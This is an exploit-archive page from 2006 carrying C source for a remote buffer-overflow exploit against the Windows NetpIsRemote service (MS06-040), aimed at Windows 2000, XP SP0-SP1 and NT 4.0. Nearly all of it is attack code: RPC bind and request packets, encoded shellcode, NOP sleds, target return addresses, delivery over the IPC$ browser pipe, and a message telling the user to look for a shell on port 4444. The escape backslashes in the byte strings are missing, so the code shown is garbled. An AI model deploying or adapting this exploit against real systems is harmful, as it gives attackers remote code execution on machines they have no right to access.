[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : MS Windows NetpIsRemote() Remote Overflow Exploit (MS06-040) (2)
# Published : 2006-08-28
# Author : ub3rst4r
# Previous Title : Streamripper <= 1.61.25 HTTP Header Parsing Buffer Overflow Exploit 2
# Next Title : IBM eGatherer <= 3.20.0284.0 (ActiveX) Remote Code Execution Exploit
/*
* MS06-040 Remote Code Execution Proof of Concept
*
* Ported by ub3r st4r aka iRP
* ---------------------------------------------------------------------
* Tested Against:
* Windows XP SP1
* Windows 2000 SP4
*
* Systems Affected:
* Microsoft Windows 2000 SP0-SP4
* Microsoft Windows XP SP0-SP1
* Microsoft Windows NT 4.0
* ---------------------------------------------------------------------
* This is provided as proof-of-concept code only for educational
* purposes and testing by authorized individuals with permission
* to do so.
*
* PRIVATE v.0.2 (08-27-06)
*/
#include <stdio.h>
#include <windows.h>
#pragma comment(lib, "mpr")
#pragma comment(lib, "Rpcrt4")
// bind uuid interface: 4b324fc8-1670-01d3-1278-5a47bf6ee188 v3.0
unsigned char DCERPC_Bind_RPC_Service[] =
"x05x00x0Bx03x10x00x00x00x48x00x00x00x00x00x00x00"
"xD0x16xD0x16x00x00x00x00x01x00x00x00x00x00x01x00"
"xC8x4Fx32x4Bx70x16xD3x01x12x78x5Ax47xBFx6ExE1x88"
"x03x00x00x00x04x5Dx88x8AxEBx1CxC9x11x9FxE8x08x00"
"x2Bx10x48x60x02x00x00x00";
// request windows api: NetprPathCanonicalize (0x1f)
unsigned char DCERPC_Request_RPC_Service[] =
"x05x00x00x03x10x00x00x00x30x08x00x00x00x00x00x00"
"x18x08x00x00x00x00x1fx00xffxffxffxffx01x00x00x00"
"x00x00x00x00x01x00x00x00x00x00x00x00";
// path ...
unsigned char DCERPC_Request_RPC_Service_[] =
"xfax00x00x00x02x00x00x00x00x00x00x00x02x00x00x00"
"x00x00x00x00xfax00x00x00x00x00x00x00";
unsigned char sc[] =
"x6ax51x59xd9xeexd9x74x24xf4x5bx81x73x13xa8x97x90"
"x88x83xebxfcxe2xf4x29x53x6fx67x57x68xd4x74xc2x7c"
"xddx60x51x68x6fx77xc8x1cxfcxacx8cx1cxd5xb4x23xeb"
"x95xf0xa9x78x1bxc7xb0x1cxcfxa8xa9x7cxd9x03x9cx1c"
"x91x66x99x57x09x24x2cx57xe4x8fx69x5dx9dx89x6ax7c"
"x64xb3xfcxb3xb8xfdx4dx1cxcfxacxa9x7cxf6x03xa4xdc"
"x1bxd7xb4x96x7bx8bx84x1cx19xe4x8cx8bxf1x4bx99x4c"
"xf4x03xebxa7x1bxc8xa4x1cxe0x94x05x1cxd0x80xf6xff"
"x1exc6xa6x7bxc0x77x7exf1xc3xeexc0xa4xa2xe0xdfxe4"
"xa2xd7xfcx68x40xe0x63x7ax6cxb3xf8x68x46xd7x21x72"
"xf6x09x45x9fx92xddxc2x95x6fx58xc0x4ex99x7dx05xc0"
"x6fx5exfbxc4xc3xdbxfbxd4xc3xcbxfbx68x40xeexc0x86"
"xccxeexfbx1ex71x1dxc0x33x8axf8x6fxc0x6fx5exc2x87"
"xc1xddx57x47xf8x2cx05xb9x79xdfx57x41xc3xddx57x47"
"xf8x6dxe1x11xd9xdfx57x41xc0xdcxfcxc2x6fx58x3bxff"
"x77xf1x6exeexc7x77x7exc2x6fx58xcexfdxf4xeexc0xf4"
"xfdx01x4dxfdxc0xd1x81x5bx19x6fxc2xd3x19x6ax99x57"
"x63x22x56xd5xbdx76xeaxbbx03x05xd2xafx3bx23x03xff"
"xe2x76x1bx81x6fxfdxecx68x46xd3xffxc5xc1xd9xf9xfd"
"x91xd9xf9xc2xc1x77x78xffx3dx51xadx59xc3x77x7exfd"
"x6fx77x9fx68x40x03xffx6bx13x4cxccx68x46xdax57x47"
"xf8x67x66x77xf0xdbx57x41x6fx58";
int main(int argc, char* argv[])
{
HANDLE hFile;
NETRESOURCE nr;
char szRemoteName[MAX_PATH], szPipePath[MAX_PATH];
unsigned int i;
unsigned char szInBuf[4096];
unsigned long dwRead, nWritten;
unsigned char szReqBuf[2096];
if (argc < 3){
printf("[-] Usage: ms06040poc <host> [target]n");
printf("t1 - Windows 2000 SP0-SP4n");
printf("t2 - Windows XP SP0-SP1n");
return -1;
}
memset(szReqBuf, 0, sizeof(szReqBuf));
if (atoi(argv[2]) == 1) {
unsigned char szBuff[1064];
// build payload buffer
memset(szBuff, 'x90', 1000);
memcpy(szBuff+630, sc, sizeof(sc));
for(i=1000; i<1064; i+=4) {
memcpy(szBuff+i, "x04x08x02x00", 4);
}
// build request buffer
memcpy(szReqBuf, DCERPC_Request_RPC_Service, sizeof(DCERPC_Request_RPC_Service)-1);
memcpy(szReqBuf+44, "x15x02x00x00", 4); /* max count */
memcpy(szReqBuf+48, "x00x00x00x00", 4); /* offset */
memcpy(szReqBuf+52, "x15x02x00x00", 4); /* actual count */
memcpy(szReqBuf+56, szBuff, sizeof(szBuff));
memcpy(szReqBuf+1120, "x00x00x00x00", 4); /* align string */
memcpy(szReqBuf+1124, DCERPC_Request_RPC_Service_, sizeof(DCERPC_Request_RPC_Service_)-1);
memcpy(szReqBuf+1140 , "xebx02", 2);
}
if (atoi(argv[2]) == 2) {
unsigned char szBuff[708];
memset(szBuff, 'x90', 612); /* size of shellcode */
memcpy(szBuff, sc, sizeof(sc));
memcpy(szBuff+612, "x0ax08x02x00", 4);
memset(szBuff+616, 'A', 8); // 8 bytes padding
memcpy(szBuff+624, "x04x08x02x00", 4);
memset(szBuff+628, 'x90', 32);
memcpy(szBuff+660, "x04x08x02x00", 4);
memset(szBuff+664, 'B', 8); // 8 bytes padding
memcpy(szBuff+672, "x04x08x02x00", 4);
memset(szBuff+676, 'x90', 32);
// build request buffer
memcpy(szReqBuf, DCERPC_Request_RPC_Service, sizeof(DCERPC_Request_RPC_Service)-1);
memcpy(szReqBuf+44, "x63x01x00x00", 4); /* max count */
memcpy(szReqBuf+48, "x00x00x00x00", 4); /* offset */
memcpy(szReqBuf+52, "x63x01x00x00", 4); /* actual count */
memcpy(szReqBuf+56, szBuff, sizeof(szBuff));
memcpy(szReqBuf+764, "x00x00x00x00", 4); /* align string */
memcpy(szReqBuf+768, DCERPC_Request_RPC_Service_, sizeof(DCERPC_Request_RPC_Service_)-1);
}
printf("[+] Connecting to %s ... n", argv[1]);
_snprintf(szRemoteName, sizeof(szRemoteName), "\\%s\ipc$", argv[1]);
nr.dwType = RESOURCETYPE_ANY;
nr.lpLocalName = NULL;
nr.lpProvider = NULL;
nr.lpRemoteName = szRemoteName;
if (WNetAddConnection2(&nr, "", "", 0) != NO_ERROR) {
printf("[-] Failed to connect to host !n");
return -1;
}
_snprintf(szPipePath, sizeof(szPipePath), "\\%s\pipe\browser", argv[1]);
hFile = CreateFile(szPipePath, GENERIC_READ|GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
if (hFile == INVALID_HANDLE_VALUE) {
printf("[-] Failed to open named pipe !n");
return -1;
}
printf("[+] Binding to RPC interface ... n");
if (TransactNamedPipe(hFile, DCERPC_Bind_RPC_Service, sizeof(DCERPC_Bind_RPC_Service), szInBuf, sizeof(szInBuf), &dwRead, NULL) == 0) {
printf("[-] Failed to bind to interface !n");
CloseHandle(hFile);
return -1;
}
printf("[+] Sending RPC request ... n");
if (!WriteFile(hFile, szReqBuf, sizeof(szReqBuf), &nWritten, 0)) {
printf("[-] Unable to transmit RPC request !n");
CloseHandle(hFile);
return -1;
}
printf("[+] Now check for shell on %s:4444 !n", argv[1]);
return 0;
}
// www.Syue.com [2006-08-28]